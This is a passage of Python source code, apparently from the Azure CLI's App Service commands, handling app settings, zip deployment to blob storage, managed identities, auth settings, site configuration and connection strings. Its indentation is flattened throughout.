"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise ValidationError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
